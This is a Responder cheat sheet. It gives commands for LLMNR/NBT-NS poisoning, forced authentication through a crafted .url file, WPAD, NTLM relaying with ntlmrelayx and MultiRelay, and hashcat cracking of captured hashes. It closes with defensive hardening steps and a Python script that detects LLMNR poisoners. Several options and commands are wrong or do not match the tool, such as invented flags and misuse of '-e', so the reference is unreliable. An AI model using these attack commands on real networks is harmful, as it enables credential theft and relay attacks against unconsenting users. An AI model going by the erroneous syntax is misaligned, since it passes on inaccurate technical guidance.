Responder Cheat Sheet

Overview

Responder is a powerful LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and MDNS (Multicast DNS) poisoner. It's designed to respond to specific network name resolution queries and includes built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2 authentication.

⚠️ Warning: Responder is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

Kali Linux

# Update package list
sudo apt update

# Install if not already installed
sudo apt install responder

From GitHub

# Clone the repository
git clone https://github.com/lgandx/Responder

# Navigate to the directory
cd Responder

# Make the Python script executable
chmod +x Responder.py

Using pip

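# Not recommended: on PyPI the name "responder" belongs to an unrelated HTTP service
# framework, so `pip install Responder` does not install this tool. Install from the
# Kali package or the GitHub repository above instead.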

Basic Usage

Starting Responder

# Basic usage with interface specification
responder -I eth0

# Start with all options enabled
responder -I eth0 -wrf

# Analyze mode (passive)
responder -I eth0 -A

Command Line Options

| Option | Description |
|--------|-------------|
| `-h, --help` | Show help message and exit |
| `-A, --analyze` | Analyze mode. Do not poison any requests, just analyze traffic |
| `-I <interface>` | Network interface to use |
| `-i <IP>` | IP address to bind to |
| `-e <IP>` | External IP address (for DHCP options) |
| `-b, --basic` | Return a Basic HTTP authentication. Default: NTLM |
| `-r, --wredir` | Enable answers for netbios wredir suffix queries |
| `-d, --NBTNSdomain` | Enable answers for netbios domain suffix queries |
| `-f, --fingerprint` | Fingerprint hosts that issued an NBT-NS or LLMNR query |
| `-w, --wpad` | Start the WPAD rogue proxy server |
| `-u, --upstream-proxy` | Upstream HTTP proxy used by the rogue WPAD proxy |
| `-F, --ForceWpadAuth` | Force NTLM/Basic authentication on wpad.dat file retrieval |
| `-P, --ProxyAuth` | Force NTLM/Basic authentication for any proxy request |
| `-lm, --LM` | Force LM hashing downgrade for Windows XP/2003 and earlier |
| `-v, --verbose` | Increase verbosity |
| `--log-local` | Log to file in addition to console |
| `-s, --disable-syslog` | Do not log to syslog |
| `-S, --disable-stdout` | Do not log to stdout |
| `-c, --config` | Path to configuration file |
| `--server=SERVER` | Enable/disable specific server (HTTP, SMB, etc.) |
| `--sql` | Enable the MSSQL server |
| `--mssql` | Enable the MSSQL server |
| `--https` | Enable the HTTPS server |
| `--http` | Enable the HTTP server |
| `--smb` | Enable the SMB server |
| `--ftp` | Enable the FTP server |
| `--imap` | Enable the IMAP server |
| `--pop` | Enable the POP server |
| `--smtp` | Enable the SMTP server |
| `--ldap` | Enable the LDAP server |
| `--dns` | Enable the DNS server |

Configuration File

The configuration file is located at /etc/responder/Responder.conf or in the Responder directory as Responder.conf.

Key Configuration Options

[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On

Attack Scenarios

Basic LLMNR/NBT-NS Poisoning

# Start Responder with default settings
responder -I eth0 -v

# Wait for authentication attempts
# Hashes will be saved in the logs directory

Forced Authentication via UNC Path

# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url

# Start Responder
responder -I eth0 -v

# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash

WPAD Attack

# Start Responder with WPAD enabled
responder -I eth0 -w -v

# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts

Relay Attack Setup

# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support

Hash Capture and Cracking

Viewing Captured Hashes

# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data

Cracking with Hashcat

# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist

# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist

Advanced Techniques

Using Responder with MultiRelay

# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL

Poisoning Specific Hosts

# Create a file with target IPs
echo "192.168.1.10" > targets.txt

# Start Responder with target file
responder -I eth0 -v -e targets.txt

Custom Challenge Value

# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788

Defensive Measures

Disabling LLMNR via Group Policy

  1. Open Group Policy Editor
  2. Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
  3. Enable "Turn off multicast name resolution"

Disabling NBT-NS via Command Line

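# Disable NBT-NS (NetBIOS over TCP/IP) on all IP-enabled adapters (PowerShell, run as Administrator)
# TcpipNetbiosOptions: 0 = use DHCP setting, 1 = enabled, 2 = disabled
Get-CimInstance Win32_NetworkAdapterConfiguration -Filter "IPEnabled = TRUE" | Invoke-CimMethod -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = [uint32]2 }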

Disabling NBT-NS via Registry

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)

Detecting Responder Activity

# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts
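
One way to monitor for suspicious LLMNR responses, as an added example that is not part of the original cheat sheet or of the Responder project: parse responses seen on UDP 5355 and flag any source that answers a canary name (a name the defender queries precisely because no host owns it) or that answers for many different names. The function names, the canary name, the `max_names` threshold and the sample capture are all assumptions constructed for illustration.

```python
import struct
from collections import defaultdict

def read_name(payload, off):
    """Read a DNS-format name at off; return (name, offset after it). A pointer ends the name."""
    labels = []
    while payload[off] and payload[off] & 0xC0 != 0xC0:
        labels.append(payload[off + 1:off + 1 + payload[off]].decode("ascii", "replace"))
        off += 1 + payload[off]
    return ".".join(labels).lower(), off + (2 if payload[off] else 1)

def parse_response(payload):
    """Return (queried_name, answer_ip) for an LLMNR A response, or None."""
    try:
        _id, flags, qdcount, ancount = struct.unpack(">4H", payload[:8])
        if not flags & 0x8000 or qdcount != 1 or ancount < 1:
            return None                                   # a query, or no answer section
        name, off = read_name(payload, 12)
        _, off = read_name(payload, off + 4)              # skip QTYPE/QCLASS, answer name
        rtype, _cls, _ttl, rdlen = struct.unpack(">HHIH", payload[off:off + 10])
        rdata = payload[off + 10:off + 10 + rdlen]
    except (IndexError, struct.error):
        return None                                       # truncated or malformed packet
    return (name, ".".join(map(str, rdata))) if rtype == 1 and len(rdata) == 4 else None

def find_poisoners(packets, canary_names, max_names=2):
    """packets: (source_ip, udp_payload) pairs from UDP 5355. Returns {source_ip: reason}."""
    names_by_source, alerts = defaultdict(set), {}
    for source, payload in packets:
        parsed = parse_response(payload)
        if parsed:
            names_by_source[source].add(parsed[0])
            if parsed[0] in canary_names:                 # no real host owns a canary name
                alerts[source] = "answered canary %s with %s" % parsed
    for source, names in names_by_source.items():
        if source not in alerts and len(names) > max_names:
            alerts[source] = "answered %d distinct names" % len(names)
    return alerts

def build_response(name, ip):  # constructed test input: single-answer LLMNR A response
    qname = bytes([len(name)]) + name.encode("ascii") + b"\x00"
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 30, 4) + bytes(map(int, ip.split(".")))
    header = struct.pack(">6H", 0x1A2B, 0x8000, 1, 1, 0, 0)  # QR=1, 1 question, 1 answer
    return header + qname + struct.pack(">HH", 1, 1) + answer

SAMPLE = [(src, build_response(name, src)) for src, name in (   # constructed capture
    ("10.0.0.5", "fileserver"), ("10.0.0.66", "canary-7f3a"),
    ("10.0.0.77", "prnt01"), ("10.0.0.77", "wpad"), ("10.0.0.77", "intranett"))]

if __name__ == "__main__":
    print(find_poisoners(SAMPLE, {"canary-7f3a"}))
```

A legitimate host normally answers only for its own name, so the per-source name count is a useful second signal when no canary query happens to be in the capture window.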

Troubleshooting

Common Issues

  1. Port Conflicts

```bash
# Check if ports are already in use
netstat -tuln | grep -E '445|80|53'

# Kill conflicting processes
sudo kill <PID>
```

  2. Interface Not Found

```bash
# List available interfaces
ip a

# Use the correct interface name
responder -I <interface>
```

  3. Permission Issues

```bash
# Run with sudo
sudo responder -I eth0
```

  4. No Hashes Captured

```bash
# Check if Responder is running in analyze mode
# Ensure the network allows the required traffic
# Try forcing authentication with UNC paths
```


This cheat sheet provides a comprehensive reference for using Responder in security testing scenarios. Always ensure you have proper authorization before using this tool in any environment.